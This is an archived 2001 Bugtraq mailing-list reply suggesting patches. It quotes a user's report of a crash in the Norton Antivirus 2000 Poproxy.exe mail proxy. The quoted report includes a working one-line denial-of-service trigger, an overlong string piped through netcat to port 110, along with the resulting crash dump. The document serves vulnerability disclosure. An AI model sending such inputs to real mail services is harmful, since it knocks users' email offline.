[20790] in bugtraq
Re: Nortan Antivirus 2000 Poproxy.exe problem
daemon@ATHENA.MIT.EDU (Eric Chien)
Mon May 28 17:39:23 2001
Message-Id: <5.0.2.1.1.20010524230336.00ab1af0@pop.mail.yahoo.com>
Date: Thu, 24 May 2001 23:04:36 +0200
To: bugtraq@securityfocus.com
From: Eric Chien <ecchien@yahoo.com>
Cc: mreckz@dingoblue.net.au
In-Reply-To: <01052420093900.01368@mrx.network>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Hello,
Verify you have the latest product patches.
http://service1.symantec.com/SUPPORT/nav.nsf/pfdocs/2000011400475506
Hope that helps,
...Eric
At 07:59 PM 5/24/2001 +0800, bugtraq@blue-ferret.com.au wrote:
>Poproxy.exe is the email virus scanner included in Nortan Antivirus 2000
>(maybe
>other versions too). It listens on port 110 and acts as a mail server,
>retreiving your mail then scanning it, and passing it along to the mail client
>(i think).
>
>While messing around with this i crashed the server by sending it
>too many characters (269 or more). Once the program crashes the
>user is unable to receive email until the next reboot (or poproxy.exe is run
>again)
>
>Example:
>perl -e '{print "A"x269}' |nc 10.0.2.1 110
>
>where 10.0.2.1 is the windows machine running poproxy.exe
>
>The output i got was:
>POPROXY caused an invalid page fault in module MFC42.DLL at 014f:5f490453.
>Registers:
>EAX=00000000 CS=014f EIP=5f490453 EFLGS=00010246
>EBX=00000000 SS=0157 ESP=02b1fc00 EBP=02b1fc14
>ECX=007c0f28 DS=0157 ESI=00000000 FS=381f
>EDX=00000000 ES=0157 EDI=007c0ef8 GS=1247
>Bytes at CS:EIP:
>89 7e 04 e8 ac 49 f8 ff 53 56 ff 76 04 e8 a7 48
>Stack dump:
>ffffffff 00000000 00000000 00a136b0 00000000 41414141 5f419f09 007c0ef8
>00a11f20 007c0f60 00000001 5f419f09 00000009 0000010d 00000001 5f419e84
>
>
>Can anyone else confirm this?
